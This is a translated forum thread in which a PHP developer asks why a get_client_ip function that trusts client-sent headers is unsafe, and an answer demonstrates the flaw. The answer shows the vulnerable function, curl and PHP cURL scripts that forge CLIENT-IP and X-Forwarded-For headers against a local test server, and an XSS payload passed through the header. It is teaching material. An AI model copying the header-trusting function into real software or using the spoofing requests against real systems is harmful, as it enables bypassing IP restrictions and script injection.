Why is not it good to use this function and how do I identify the user's IP then?

2
public function get_client_ip() {
                $ipaddress = '';
                if (isset($_SERVER['HTTP_CLIENT_IP']))
                    $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
                else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
                    $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
                else if(isset($_SERVER['HTTP_X_FORWARDED']))
                    $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
                else if(isset($_SERVER['HTTP_FORWARDED_FOR']))
                    $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
                else if(isset($_SERVER['HTTP_FORWARDED']))
                    $ipaddress = $_SERVER['HTTP_FORWARDED'];
                else if(isset($_SERVER['REMOTE_ADDR']))
                    $ipaddress = $_SERVER['REMOTE_ADDR'];
                else
                    $ipaddress = 'Desconhecido';

                return $ipaddress;
        }

This code is not good because it has security problems I have seen several times saying here in the forum

How do I get the ip then? In PHP

    
asked by anonymous 21.07.2017 / 22:10

1 answer

5

Because you trust the header sent by the client, simple as that. This allows the client to spoof IP by allowing IP Spoofing .

Basically the rule is "Never trust any header", just as you should never trust a cookie (which is also a header).

How to attack this code? You can even test it yourself!

  • Server:

    echo 'IP deste codigo: ' . get_client_ip();
    echo PHP_EOL;
    echo 'IP real:         ' . $_SERVER['REMOTE_ADDR'];
    
  • Client:

    curl http://seusite.com -H "CLIENT-IP: 111.222.333.444"
    

curl is a software to make requests, the parameter -H adds a header, in this case with the name of CLIENT-IP with the value of 111.222.333.444 . There are several softwares that can do this too, curl think it is the most used, but very far from being unique.

For "simulation" I used a notebook as a client (IP is 192.168.100.196) and a desktop as a server (IP is 192.168.100.122) that had the above code, both on the same network, so I executed:

curl http://192.168.100.122/iptester.php -H "CLIENT-IP: 111.222.333.444"

Result:

IP deste codigo: 111.222.333.444
IP real:         192.168.100.196

Ready, we have a fake IP! We can ignore any IP restriction! >: D

Note that your function trusts the sent header. This could be even more serious because as we are using echo get_client_ip(); being vulnerable to XSS, after all:

CLIENT-IP: <script>alert('xss')</script>

This would run in the browser, because there is no filter.

If you want to attack using PHP itself, then also use cURL:

$alvo = 'http://192.168.100.122/iptester.php';
$ipFalso = '111.222.333.444';

$curl = curl_init($alvo);

curl_setopt_array($curl, [

    CURLOPT_HTTPHEADER => [
        'CLIENT-IP:' . $ipFalso,
        'X-FORWARDED-FOR:' . $ipFalso,
        'X-FORWARDED:' . $ipFalso,
        'FORWARDED-FOR:' . $ipFalso,
        'FORWARDED:' . $ipFalso,
    ],

]);

curl_exec($curl);

Assuming that http://192.168.100.122/iptester.php contains the sample code mentioned above. ;)

    
21.07.2017 / 23:01